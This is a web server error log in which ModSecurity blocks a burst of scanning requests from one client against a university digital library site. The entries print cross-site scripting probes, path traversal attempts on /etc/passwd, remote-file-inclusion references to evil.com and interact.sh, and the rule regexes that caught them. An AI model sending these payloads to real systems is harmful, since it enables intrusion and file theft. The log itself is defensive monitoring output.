[Tue Aug 29 11:55:24.047069 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16PMCo-f0AAAqeFVgAAAAx"]
[Tue Aug 29 11:55:24.638139 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16PMCo-f0AAAolKoAAAAAe"]
[Tue Aug 29 11:55:24.744634 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PMCo-f0AAAqsV6wAAAAB"]
[Tue Aug 29 11:55:25.815615 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PcCo-f0AAAqsV68AAAAB"]
[Tue Aug 29 11:55:25.838835 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:fccc'\\x5c\\x5c\\x22><svg/onload: fccc'\\x5c\\x22><svg/onload"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PcCo-f0AAAoz8FkAAAAS"]
[Tue Aug 29 11:55:26.702889 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/search/"] [unique_id "ZO16PsCo-f0AAAqTvrYAAAAa"]
[Tue Aug 29 11:55:28.687126 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QMCo-f0AAAqeFXMAAAAx"]
[Tue Aug 29 11:55:29.602668 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16QcCo-f0AAAqqtgQAAAAA"]
[Tue Aug 29 11:55:29.873170 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QcCo-f0AAAoz8GwAAAAS"]
[Tue Aug 29 11:55:30.691378 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16QsCo-f0AAApHRhUAAAAP"]
[Tue Aug 29 11:55:31.693505 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16Q8Co-f0AAApbUioAAAAh"]
[Tue Aug 29 11:55:32.793228 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RMCo-f0AAApbUjgAAAAh"]
[Tue Aug 29 11:55:33.856687 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RcCo-f0AAAolKr0AAAAe"]
[Tue Aug 29 11:55:35.777400 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16R8Co-f0AAAolKtAAAAAe"]
[Tue Aug 29 11:55:36.139302 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:key: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16SMCo-f0AAAq4fUoAAAAJ"]
[Tue Aug 29 11:55:36.663844 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAq5@CQAAAAK"]
[Tue Aug 29 11:55:37.532758 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16ScCo-f0AAAqeFYIAAAAx"]
[Tue Aug 29 11:55:38.127546 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16SsCo-f0AAAq3a5kAAAAI"]
[Tue Aug 29 11:55:38.169031 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16SsCo-f0AAApHRj8AAAAP"]
[Tue Aug 29 11:55:38.606603 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16SsCo-f0AAAqSwwcAAAAN"]
[Tue Aug 29 11:55:39.870664 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16S8Co-f0AAAqSwxEAAAAN"]
[Tue Aug 29 11:55:41.921004 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TcCo-f0AAAqqthsAAAAA"]
[Tue Aug 29 11:55:43.857707 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16T8Co-f0AAAolKvUAAAAe"]
[Tue Aug 29 11:55:43.920547 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16T8Co-f0AAAqeFaEAAAAx"]
[Tue Aug 29 11:55:44.566655 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UMCo-f0AAAqSwzMAAAAN"]
[Tue Aug 29 11:55:44.668674 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UMCo-f0AAAq@sYEAAAAM"]
[Tue Aug 29 11:55:45.552415 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UcCo-f0AAAqTvxYAAAAa"]
[Tue Aug 29 11:55:46.567733 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16UsCo-f0AAApbUn4AAAAh"]
[Tue Aug 29 11:55:46.589668 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname 